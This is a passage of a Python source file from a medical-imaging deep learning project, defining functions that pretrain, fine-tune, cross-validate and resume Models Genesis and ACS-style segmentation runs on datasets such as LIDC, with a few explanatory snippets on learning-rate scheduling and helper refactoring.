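The supervised configs above pair `scheduler_sup = "MultiStepLR"` with milestones at 50% and 75% of `nb_epoch_sup` and `gamma = 0.1`. A minimal, framework-free sketch of what that schedule does to the learning rate (`multistep_lr` is a hypothetical name; PyTorch's `torch.optim.lr_scheduler.MultiStepLR` implements the same decay):

```python
def multistep_lr(base_lr, milestones, gamma, epoch):
    # MultiStepLR-style decay: multiply base_lr by gamma once for every
    # milestone epoch that has already passed.
    passed = sum(1 for m in milestones if epoch >= m)
    return base_lr * (gamma ** passed)

# The config above: lr_sup=0.001, nb_epoch_sup=100 -> milestones [50, 75], gamma=0.1
milestones = [50, 75]
lr_early = multistep_lr(0.001, milestones, 0.1, 10)  # still at base lr
lr_mid = multistep_lr(0.001, milestones, 0.1, 60)    # decayed once
lr_late = multistep_lr(0.001, milestones, 0.1, 90)   # decayed twice
```

With `patience_sup_terminate` set above the epoch count, the run always sees both decay steps.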
def resume_replicate_acs_results_fcnresnet18_my_cubes(run_nr, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = ["lidc_80_80_padded"]
config = FineTuneConfig(
data_dir="",
task="REPLICATE_ACS_PAPER",
self_supervised=False,
supervised=True,
model=kwargs_dict_["model"],
)
config.override_dirs(run_nr)
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError("Could not find CONFIG object pickle. Did you specify a valid run number?")
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
config.resume_sup = True
config.display()
trainer_mg_replication = Trainer(config, dataset)
trainer_mg_replication.load_model(from_latest_checkpoint=True)
trainer_mg_replication.finetune_supervised()
trainer_mg_replication.add_hparams_to_writer()
trainer_mg_replication.get_stats()
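Every `resume_*` function repeats the same load-or-raise pattern for `config.pkl` and `dataset.pkl`. A sketch of how it could be factored into one helper (`load_pickled_or_raise` is a hypothetical name; the codebase's `load_object` presumably wraps `pickle` in a similar way):

```python
import os
import pickle

def load_pickled_or_raise(object_dir, name):
    # Fetch a pickled object (e.g. "config" or "dataset") from a run's
    # object_dir, or fail loudly when the run number does not correspond
    # to a previously saved run.
    path = os.path.join(object_dir, "{}.pkl".format(name))
    if not os.path.isfile(path):
        raise FileNotFoundError(
            "Could not find {} object pickle. Did you specify a valid run number? Path was {}".format(
                name.upper(), path
            )
        )
    with open(path, "rb") as f:
        return pickle.load(f)
```

Each resume function would then reduce its two if/else blocks to `config = load_pickled_or_raise(config.object_dir, "config")` and the same for the dataset.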
"""
---
PRETRAIN MODEL ON DIFFERENT DATASET WITH MG FRAMEWORK
"""
def pretrain_mg_framework_specific_dataset(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort() # sort alphabetically: without a stable order the same datasets create different task dirs, e.g. [lidc, brats] vs [brats, lidc]
split = kwargs_dict_.get("split", (0.8, 0.2, 0))
mode = kwargs_dict_.get("mode", "")
return_axis_index = kwargs_dict_.get("return_axis_index", False)
advance_index_on = kwargs_dict_["advance_index_on"]
# fix_unsqueeze_order = kwargs_dict_.get("fix_unsqueeze_order", False)  # only matters for supervision; irrelevant in the 2D setting
datasets_used_str = get_datasets_used_str(
dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"], return_axis_index=return_axis_index
)
# config = models_genesis_config(True, task="PRETRAIN_MG_FRAMEWORK{}".format(datasets_used_str))
config = FineTuneConfig(
data_dir="",
task="PRETRAIN_MG_FRAMEWORK{}".format(datasets_used_str),
self_supervised=True,
supervised=False,
model=kwargs_dict_["model"],
extra_info_on_task_dir=False,
)
config.make_config_as_original_mg()
replace_config_param_attributes(config, kwargs_dict_)
config.display()
dataset = build_dataset(
dataset_list=dataset_list,
split=split,
two_dimensional_data=kwargs_dict_["two_dimensional_data"],
data_limit_2d=kwargs_dict_["data_limit_2d"],
return_axis_index=kwargs_dict_["return_axis_index"],
advance_index_on=advance_index_on,
)
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer_mg_replication = Trainer(config, dataset)
trainer_mg_replication.load_model(from_scratch=True) # fix_unsqueeze_order=fix_unsqueeze_order)
trainer_mg_replication.finetune_self_supervised()
trainer_mg_replication.add_hparams_to_writer()
trainer_mg_replication.get_stats()
def resume_pretrain_mg_framework_specific_dataset(run_nr: int, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort() # sort alphabetically: without a stable order the same datasets create different task dirs, e.g. [lidc, brats] vs [brats, lidc]
mode = kwargs_dict_.get("mode", "")
return_axis_index = kwargs_dict_.get("return_axis_index", False)
# fix_unsqueeze_order = kwargs_dict_.get("fix_unsqueeze_order", False)
datasets_used_str = get_datasets_used_str(
dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"], return_axis_index=return_axis_index
)
# config = models_genesis_config(True, task="PRETRAIN_MG_FRAMEWORK{}".format(datasets_used_str))
config = FineTuneConfig(
data_dir="",
task="PRETRAIN_MG_FRAMEWORK{}".format(datasets_used_str),
self_supervised=True,
supervised=False,
model=kwargs_dict_["model"],
extra_info_on_task_dir=False,
)
config.override_dirs(run_nr)
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError("Could not find CONFIG object pickle. Did you specify a valid run number?")
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
replace_config_param_attributes(config, kwargs_dict_)
config.resume_ss = True
config.display()
trainer_mg_replication = Trainer(config, dataset)
trainer_mg_replication.load_model(from_latest_checkpoint=True)
trainer_mg_replication.finetune_self_supervised()
trainer_mg_replication.add_hparams_to_writer()
trainer_mg_replication.get_stats()
"""
---
"""
def use_provided_weights_and_finetune_on_dataset_without_ss(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
num_cv_folds = kwargs_dict_.get("num_cv_folds", None)
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort() # sort alphabetically: without a stable order the same datasets create different task dirs, e.g. [lidc, brats] vs [brats, lidc]
split = kwargs_dict_.get("split", (0.8, 0.2, 0))
mode = kwargs_dict_.get("mode", "")
new_folder = kwargs_dict_["new_folder"]
datasets_used_str = get_datasets_used_str(dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"])
dataset = build_dataset(dataset_list=dataset_list, split=split, use_supervision_transforms=kwargs_dict_["use_supervision_transforms"])
config = FineTuneConfig(
data_dir="",
task="FROM_PROVIDED_WEIGHTS{}".format(datasets_used_str)
if kwargs_dict_["task_name"] is None
else "{}{}".format(kwargs_dict_["task_name"], datasets_used_str),
self_supervised=False,
supervised=True,
new_folder=new_folder,
)
replace_config_param_attributes(config, kwargs_dict_)
config.resume_from_provided_weights = True # Redundant, just for logging purposes
if num_cv_folds is not None:
cv = get_cross_validator_object_of_task_dir(config.task_dir)
if cv is None:
if config.experiment_nr == 1:
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds)
cv.override_dataset_files_with_splits()
save_object(cv, "cross_validator", config.object_dir)
print("RUN 1: Building cross validator")
else:
print("TOO LATE TO BRING CROSS VALIDATION IN")
else:
cv.set_dataset(dataset)
cv.override_dataset_files_with_splits()
# to "lose" the used splits (they are popped), the updated cross validator must be saved back into the run-1 objects
save_cross_validator_object_of_task_dir(cv, config.task_dir)
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer = Trainer(config, dataset)
trainer.load_model(from_provided_weights=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
def resume_use_provided_weights_and_finetune_on_dataset_without_ss(run_nr: int, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
mode = kwargs_dict_.get("mode", "")
new_folder = kwargs_dict_["new_folder"]
datasets_used_str = get_datasets_used_str(dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"])
config = FineTuneConfig(
data_dir="",
task="FROM_PROVIDED_WEIGHTS{}".format(datasets_used_str),
self_supervised=False,
supervised=True,
new_folder=new_folder,
)
config.override_dirs(run_nr) # key: use the object_dir of this run so the correct saved config object is fetched
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError("Could not find CONFIG object pickle. Did you specify a valid run number?")
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
replace_config_param_attributes(config, kwargs_dict_)
config.resume_sup = True
config.display()
trainer = Trainer(config, dataset)
trainer.load_model(from_latest_checkpoint=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
"""
---
"""
def use_provided_weights_and_finetune_on_dataset_with_ss(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
num_cv_folds = kwargs_dict_.get("num_cv_folds", None)
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
split = kwargs_dict_.get("split", (0.8, 0.2, 0))
mode = kwargs_dict_.get("mode", "")
datasets_used_str = get_datasets_used_str(dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"])
new_folder = kwargs_dict_["new_folder"]
dataset = build_dataset(dataset_list=dataset_list, split=split)
config = FineTuneConfig(
data_dir="",
task="FROM_PROVIDED_WEIGHTS{}".format(datasets_used_str),
self_supervised=True,
supervised=True,
model=kwargs_dict_["model"],
new_folder=new_folder,
)
replace_config_param_attributes(config, kwargs_dict_)
config.resume_from_provided_weights = True # Redundant, just for logging purposes
if num_cv_folds is not None:
cv = get_cross_validator_object_of_task_dir(config.task_dir)
if cv is None:
if config.experiment_nr == 1:
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds)
cv.override_dataset_files_with_splits()
save_object(cv, "cross_validator", config.object_dir)
print("RUN 1: Building cross validator")
else:
print("TOO LATE TO BRING CROSS VALIDATION IN")
else:
cv.set_dataset(dataset)
cv.override_dataset_files_with_splits()
# to "lose" the used splits (they are popped), the updated cross validator must be saved back into the run-1 objects
save_cross_validator_object_of_task_dir(cv, config.task_dir)
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer = Trainer(config, dataset)
trainer.load_model(from_provided_weights=True)
trainer.finetune_self_supervised()
trainer.load_model(from_latest_improvement_ss=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
def resume_use_provided_weights_and_finetune_on_dataset_with_ss(run_nr: int, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
mode = kwargs_dict_.get("mode", "")
new_folder = kwargs_dict_["new_folder"]
datasets_used_str = get_datasets_used_str(dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"])
config = FineTuneConfig(
data_dir="",
task="FROM_PROVIDED_WEIGHTS{}".format(datasets_used_str),
self_supervised=True,
supervised=True,
model=kwargs_dict_["model"],
new_folder=new_folder,
)
config.override_dirs(run_nr) # key: use the object_dir of this run so the correct saved config object is fetched
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError("Could not find CONFIG object pickle. Did you specify a valid run number?")
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
replace_config_param_attributes(config, kwargs_dict_)
config.resume_ss = True
config.resume_sup = True
config.display()
trainer = Trainer(config, dataset)
completed_ss = trainer.ss_has_been_completed()
if not completed_ss:
trainer.load_model(from_latest_checkpoint=True)
trainer.finetune_self_supervised()
trainer.load_model(from_latest_improvement_ss=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
else:
trainer.load_model(from_latest_checkpoint=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
"""
---
"""
def use_model_weights_and_do_self_supervision(**kwargs):
# pass the directory of the task containing the model you want to resume from
kwargs_dict_ = kwargs["kwargs_dict"]
num_cv_folds = kwargs_dict_.get("num_cv_folds", None)
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
model_weights_dir = kwargs_dict_["directory"]
split = kwargs_dict_.get("split", (0.8, 0.2, 0))
mode = kwargs_dict_.get("mode", "")
convert_acs = kwargs_dict_["convert_to_acs"]
new_folder = kwargs_dict_["new_folder"]
datasets_used_str = get_datasets_used_str(
dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"], convert_to_acs=convert_acs
)
dataset = build_dataset(
dataset_list=dataset_list,
split=split,
two_dimensional_data=kwargs_dict_["two_dimensional_data"],
use_supervision_transforms=kwargs_dict_["use_supervision_transforms"],
)
config = FineTuneConfig(
data_dir="",
task="FROM_{}_DO_SS_ON_{}".format(model_weights_dir, datasets_used_str),
self_supervised=True,
supervised=False,
model=kwargs_dict_["model"],
new_folder=new_folder,
)
config.make_config_as_original_mg()
replace_config_param_attributes(config, kwargs_dict_)
config.resume_from_specific_model = True # Redundant, just for logging purposes
if num_cv_folds is not None:
cv = get_cross_validator_object_of_task_dir(config.task_dir)
if cv is None:
if config.experiment_nr == 1:
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds)
cv.override_dataset_files_with_splits()
save_object(cv, "cross_validator", config.object_dir)
print("RUN 1: Building cross validator")
else:
print("TOO LATE TO BRING CROSS VALIDATION IN")
else:
cv.set_dataset(dataset)
cv.override_dataset_files_with_splits()
# to "lose" the used splits (they are popped), the updated cross validator must be saved back into the run-1 objects
save_cross_validator_object_of_task_dir(cv, config.task_dir)
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer = Trainer(config, dataset)
trainer.load_model(from_directory=True, directory=model_weights_dir, convert_acs=convert_acs)
trainer.finetune_self_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
def resume_use_model_weights_and_do_self_supervision(run_nr: int, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
model_weights_dir = kwargs_dict_["directory"] # to find the task dir to resume from
mode = kwargs_dict_.get("mode", "")
convert_acs = kwargs_dict_["convert_to_acs"] # needs to be called on resume to find task dir
datasets_used_str = get_datasets_used_str(
dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"], convert_to_acs=convert_acs
)
config = FineTuneConfig(
data_dir="",
task="FROM_{}_DO_SS_ON_{}".format(model_weights_dir, datasets_used_str),
self_supervised=True,
supervised=False,
model=kwargs_dict_["model"],
new_folder=kwargs_dict_["new_folder"],
)
config.override_dirs(run_nr)
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError(
"Could not find CONFIG object pickle. Did you specify a valid run number? Path was {}".format(
os.path.join(config.object_dir, "config.pkl")
)
)
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
replace_config_param_attributes(config, kwargs_dict_, ilegal=["model"])
config.resume_ss = True
config.display()
trainer = Trainer(config, dataset)
trainer.load_model(from_latest_checkpoint=True) # if converting to ACS, the resumed config should already have unet_acs as the model
trainer.finetune_self_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
def use_model_weights_and_finetune_on_dataset_without_ss(**kwargs):
# pass the directory of the task containing the model you want to resume from
kwargs_dict_ = kwargs["kwargs_dict"]
num_cv_folds = kwargs_dict_.get("num_cv_folds", None)
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
model_weights_dir = kwargs_dict_["directory"]
split = kwargs_dict_.get("split", (0.8, 0.2, 0))
mode = kwargs_dict_.get("mode", "")
convert_acs = kwargs_dict_["convert_to_acs"]
new_folder = kwargs_dict_["new_folder"]
# unet cls
pool_features = kwargs_dict_["pool_features"]
encoder_depth = kwargs_dict_.get("encoder_depth", None)
branch_arch = kwargs_dict_.get("branch_arch", None)
branch_depth = kwargs_dict_.get("branch_depth", None)
bridge_mode = kwargs_dict_.get("bridge_mode", None)
datasets_used_str = get_datasets_used_str(
dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"], convert_to_acs=convert_acs
)
if bridge_mode is not None:
datasets_used_str = bridge_mode + datasets_used_str
if branch_depth is not None:
datasets_used_str = "_depth_{}".format(branch_depth) + datasets_used_str
if branch_arch is not None:
datasets_used_str = branch_arch + datasets_used_str
if encoder_depth is not None:
tmp = "".join("_{}_".format(i) for i in encoder_depth)
datasets_used_str = tmp + datasets_used_str
dataset = build_dataset(
dataset_list=dataset_list,
split=split,
two_dimensional_data=kwargs_dict_["two_dimensional_data"],
use_supervision_transforms=kwargs_dict_["use_supervision_transforms"],
)
config = FineTuneConfig(
data_dir="",
task="FROM_{}_{}".format(model_weights_dir, datasets_used_str),
self_supervised=False,
supervised=True,
model=kwargs_dict_["model"],
new_folder=new_folder,
)
replace_config_param_attributes(config, kwargs_dict_)
config.resume_from_specific_model = True # Redundant, just for logging purposes
if num_cv_folds is not None:
cv = get_cross_validator_object_of_task_dir(config.task_dir)
if cv is None:
if config.experiment_nr == 1:
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds)
cv.override_dataset_files_with_splits()
save_object(cv, "cross_validator", config.object_dir)
print("RUN 1: Building cross validator")
else:
print("TOO LATE TO BRING CROSS VALIDATION IN")
else:
cv.set_dataset(dataset)
cv.override_dataset_files_with_splits()
# to "lose" the used splits (they are popped), the updated cross validator must be saved back into the run-1 objects
save_cross_validator_object_of_task_dir(cv, config.task_dir)
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer = Trainer(config, dataset)
trainer.load_model(
from_directory=True,
directory=model_weights_dir,
convert_acs=convert_acs,
pool_features=pool_features,
encoder_depth=encoder_depth,
branch_arch=branch_arch,
branch_depth=branch_depth,
bridge_mode=bridge_mode,
)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
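The chain of prefix concatenations above encodes every optional architecture kwarg into the task string, so each variant lands in its own task dir. The same logic as a standalone sketch (`build_task_suffix` is a hypothetical helper name; the prepend order matches the ifs above):

```python
def build_task_suffix(base, bridge_mode=None, branch_depth=None, branch_arch=None, encoder_depth=None):
    # Prepend each optional architecture kwarg, innermost-first, so that
    # different configurations produce distinct task directory names.
    s = base
    if bridge_mode is not None:
        s = bridge_mode + s
    if branch_depth is not None:
        s = "_depth_{}".format(branch_depth) + s
    if branch_arch is not None:
        s = branch_arch + s
    if encoder_depth is not None:
        s = "".join("_{}_".format(i) for i in encoder_depth) + s
    return s
```

With no optional kwargs the base string passes through untouched, which is why runs with default architectures share a task dir.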
def resume_use_model_weights_and_finetune_on_dataset_without_ss(run_nr: int, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
model_weights_dir = kwargs_dict_["directory"] # to find the task dir to resume from
mode = kwargs_dict_.get("mode", "")
convert_acs = kwargs_dict_["convert_to_acs"] # needs to be called on resume to find task dir
new_folder = kwargs_dict_["new_folder"]
datasets_used_str = get_datasets_used_str(
dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"], convert_to_acs=convert_acs
)
config = FineTuneConfig(
data_dir="",
task="FROM_{}_{}".format(model_weights_dir, datasets_used_str),
self_supervised=False,
supervised=True,
model=kwargs_dict_["model"],
new_folder=kwargs_dict_["new_folder"],
)
config.override_dirs(run_nr)
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError("Could not find CONFIG object pickle. Did you specify a valid run number?")
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
replace_config_param_attributes(config, kwargs_dict_, ilegal=["model"])
config.resume_sup = True
config.display()
trainer = Trainer(config, dataset)
trainer.load_model(from_latest_checkpoint=True) # if converting to ACS, the resumed config should already have unet_acs as the model
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
"""
---
"""
def use_model_weights_and_finetune_on_dataset_with_ss(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
num_cv_folds = kwargs_dict_.get("num_cv_folds", None)
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
model_weights_dir = kwargs_dict_["directory"]
split = kwargs_dict_.get("split", (0.8, 0.2, 0))
mode = kwargs_dict_.get("mode", "")
convert_acs = kwargs_dict_["convert_to_acs"] # needs to be called on resume to find task dir
datasets_used_str = get_datasets_used_str(
dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"], convert_to_acs=convert_acs
)
dataset = build_dataset(dataset_list=dataset_list, split=split, two_dimensional_data=kwargs_dict_["two_dimensional_data"])
config = FineTuneConfig(
data_dir="",
task="FROM_{}_{}".format(model_weights_dir, datasets_used_str),
self_supervised=True,
supervised=True,
model=kwargs_dict_["model"],
)
replace_config_param_attributes(config, kwargs_dict_)
config.resume_from_specific_model = True # Redundant, just for logging purposes
if num_cv_folds is not None:
cv = get_cross_validator_object_of_task_dir(config.task_dir)
if cv is None:
if config.experiment_nr == 1:
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds)
cv.override_dataset_files_with_splits()
save_object(cv, "cross_validator", config.object_dir)
print("RUN 1: Building cross validator")
else:
print("TOO LATE TO BRING CROSS VALIDATION IN")
else:
cv.set_dataset(dataset)
cv.override_dataset_files_with_splits()
# to "lose" the used splits (they are popped), the updated cross validator must be saved back into the run-1 objects
save_cross_validator_object_of_task_dir(cv, config.task_dir)
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer = Trainer(config, dataset)
trainer.load_model(from_directory=True, directory=model_weights_dir, convert_acs=convert_acs)
trainer.finetune_self_supervised()
trainer.load_model(from_latest_improvement_ss=True) # here it's already loading from the dir of the task
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
def resume_use_model_weights_and_finetune_on_dataset_with_ss(run_nr: int, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
model_weights_dir = kwargs_dict_["directory"]
mode = kwargs_dict_.get("mode", "")
convert_acs = kwargs_dict_["convert_to_acs"] # needs to be called on resume to find task dir
datasets_used_str = get_datasets_used_str(
dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"], convert_to_acs=convert_acs
)
config = FineTuneConfig(
data_dir="",
task="FROM_{}_{}".format(model_weights_dir, datasets_used_str),
self_supervised=True,
supervised=True,
model=kwargs_dict_["model"],
)
config.override_dirs(run_nr)
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError("Could not find CONFIG object pickle. Did you specify a valid run number?")
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
replace_config_param_attributes(config, kwargs_dict_)
config.resume_ss = True
config.resume_sup = True
config.display()
trainer = Trainer(config, dataset)
completed_ss = trainer.ss_has_been_completed()
# acs resuming: if it's resuming config should already have unet_acs as model
if not completed_ss:
trainer.load_model(from_latest_checkpoint=True)
trainer.finetune_self_supervised()
trainer.load_model(from_latest_improvement_ss=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
else:
trainer.load_model(from_latest_checkpoint=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
"""
---
"""
def train_from_scratch_on_dataset_no_ss(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
num_cv_folds = kwargs_dict_.get("num_cv_folds", None)
cv_fold = kwargs_dict_["cv_fold"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort() # sort alphabetically: without a stable order the same datasets create different task dirs, e.g. [lidc, brats] vs [brats, lidc]
split = kwargs_dict_.get("split", (0.8, 0.2, 0))
mode = kwargs_dict_.get("mode", "")
make_acs_kernel_split_adaptive_to_input_dimensions = kwargs_dict_.get("make_acs_kernel_split_adaptive_to_input_dimensions", None)
# unet cls
pool_features = kwargs_dict_["pool_features"]
encoder_depth = kwargs_dict_.get("encoder_depth", None)
branch_arch = kwargs_dict_.get("branch_arch", None)
branch_depth = kwargs_dict_.get("branch_depth", None)
bridge_mode = kwargs_dict_.get("bridge_mode", None)
introduce_surrogate_at_epoch = kwargs_dict_.get("introduce_surrogate_at_epoch", 0)
add_batch_size_to_task = kwargs_dict_.get("add_batch_size_to_task", False)
add_to_task = kwargs_dict_.get("add_to_task", "")  # default "" so the add_to_task != "" check below does not append "_False"
surrogate_loss_weight = kwargs_dict_.get("surrogate_loss_weight", False)
for key, value in kwargs_dict_.items():  # log the kwargs this run received
print(key, value)
datasets_used_str = get_datasets_used_str(dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"])
if make_acs_kernel_split_adaptive_to_input_dimensions is True:
datasets_used_str = "_WITH_ADAPTIVE_ACS_KERNEL" + datasets_used_str
if bridge_mode is not None:
datasets_used_str = bridge_mode + datasets_used_str
if branch_depth is not None:
datasets_used_str = "_depth_{}".format(branch_depth) + datasets_used_str
if branch_arch is not None:
datasets_used_str = branch_arch + datasets_used_str
encoder_depth_str = ""
if encoder_depth is not None:
for depth in encoder_depth:
encoder_depth_str += "_{}".format(depth)
if cv_fold is True:
encoder_depth_str += "_same_partition"
if introduce_surrogate_at_epoch != 0:
encoder_depth_str += "_introduce_at_{}".format(introduce_surrogate_at_epoch)
if add_batch_size_to_task is not False:
batch_size_sup = kwargs_dict_["batch_size_sup"]
encoder_depth_str += "_batch_{}".format(batch_size_sup)
if add_to_task != "":
encoder_depth_str += "_{}".format(add_to_task)
if surrogate_loss_weight is not False:
encoder_depth_str += "_{}".format(surrogate_loss_weight)
dataset = build_dataset(
dataset_list=dataset_list,
split=split,
two_dimensional_data=kwargs_dict_["two_dimensional_data"],
use_supervision_transforms=kwargs_dict_["use_supervision_transforms"],
)
config = FineTuneConfig(
data_dir="",
task="FROM_SCRATCH{}".format(datasets_used_str),
self_supervised=False,
supervised=True,
model=kwargs_dict_["model"],
add_to_task=encoder_depth_str,
)
replace_config_param_attributes(config, kwargs_dict_)
config.from_scratch = True # Redundant, just for logging purposes
# TODO: move to function call
if make_acs_kernel_split_adaptive_to_input_dimensions is True:
x, y = dataset.get_train(batch_size=1)
shape = x.shape[2:]  # spatial dimensions only
total = sum(shape)
acs_kernel_split = tuple(float(i) / total for i in shape)  # each view's share is proportional to its spatial extent
dataset.reset()
else:
acs_kernel_split = None
if cv_fold is True:
if add_to_task == "new_test_set":
cv = CrossValidator(config, dataset, nr_splits=5, force_generate_splits=True, new_test_set=True)
else:
cv = CrossValidator(config, dataset, nr_splits=5, force_generate_splits=True)
cv.override_dataset_files_with_splits() # use 1st partition only
if num_cv_folds is not None:
if cv_fold is True:
raise ValueError("cv_fold and num_cv_folds are mutually exclusive")
cv = get_cross_validator_object_of_task_dir(config.task_dir)
if cv is None:
if config.experiment_nr == 1:
if add_to_task == "new_test_set":
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds, new_test_set=True)
else:
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds)
cv.override_dataset_files_with_splits()
save_object(cv, "cross_validator", config.object_dir)
print("RUN 1: Building cross validator")
else:
print("TOO LATE TO BRING CROSS VALIDATION IN")
else:
cv.set_dataset(dataset)
cv.override_dataset_files_with_splits()
# to "lose" the used splits (they are popped), the updated cross validator must be saved back into the run-1 objects
save_cross_validator_object_of_task_dir(cv, config.task_dir)
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer = Trainer(config, dataset)
trainer.load_model(
from_scratch=True,
acs_kernel_split=acs_kernel_split,
pool_features=pool_features,
encoder_depth=encoder_depth,
branch_arch=branch_arch,
branch_depth=branch_depth,
bridge_mode=bridge_mode,
in_channels=kwargs_dict_["in_channels"],
out_channels=kwargs_dict_["out_channels"],
)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
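The adaptive ACS kernel split computed inside the function above divides the kernels among the three ACS views in proportion to each spatial dimension of the input, so the fractions always sum to 1. A minimal sketch of that computation (`adaptive_acs_kernel_split` is a hypothetical name):

```python
def adaptive_acs_kernel_split(spatial_shape):
    # Each spatial dimension gets a share of the kernels proportional
    # to its extent; the resulting fractions sum to 1.
    total = sum(spatial_shape)
    return tuple(float(dim) / total for dim in spatial_shape)

# e.g. a non-cubic 80x80x40 input weights the shorter axis less
split = adaptive_acs_kernel_split((80, 80, 40))
```

In the trainer this tuple is passed straight to `load_model` as `acs_kernel_split`; `None` falls back to the model's default split.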
def resume_train_from_scratch_on_dataset_no_ss(run_nr: int, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
